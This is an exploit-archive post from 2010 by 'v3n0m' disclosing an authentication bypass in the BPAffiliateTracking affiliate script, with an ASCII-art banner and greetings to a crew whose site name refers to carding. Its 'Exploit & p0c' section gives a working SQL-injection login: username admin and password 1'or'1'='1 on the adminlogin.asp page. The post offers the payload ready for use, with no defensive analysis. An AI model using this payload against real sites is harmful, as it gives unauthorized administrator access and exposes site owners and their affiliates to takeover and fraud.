[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : BPAffiliate Affiliate Tracking Authentication Bypass Vulnerability
# Published : 2010-11-16
# Author : v3n0m
# Previous Title : Web Wiz NewsPad Express Edition 1.03 Database File Disclosure Vulnerability
# Next Title : CompactCMS 1.4.1 SQL Injection Vulnerability
) ) ) ( ( ( ( ( ) )
( /(( /( ( ( /( ( ( ( ) )) ) ) )) ) ) ) ( /( ( /(
)())())) ) )()) ) ) ) (()/(()/( ( (()/(()/((()/( )()) )())
((_)((_)(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) ) /(_))(_))/(_))(_)|((_)
__ ((_)((_)/(_))___ ((_) _ ) )___) _ )(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)
/ / _ (_)) __ / (_)_(_)(/ __(_)_(_) _ | | __| _ | |_ _|| | | |/ /
V / (_) || (_ | V / / _ | (__ / _ | /| |) | _|| / |__ | | | .` | ' <
|_| ___/ ___| |_| /_/ _ ___/_/ _|_|_|___/|___|_|_____|___||_|_|_|_
.WEB.ID
-----------------------------------------------------------------------
BPAffiliateTracking Authentication Bypass Vulnerability
-----------------------------------------------------------------------
Author : v3n0m
Site : http://yogyacarderlink.web.id/
Date : November, 16-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
Application : BPAffiliateTracking - Affiliate Tracking Script
Price : $24.40
Vendor : http://www.bpowerhouse.info/
Exploit & p0c
_____________
go to
http://127.0.0.1/[path]/adminlogin.asp
then login with
Username : admin
Password : 1'or'1'='1
ShoutZ
______
All YOGYACARDERLINK CREW, GheMaX, LeQhi
Also Jovita & Fabian :)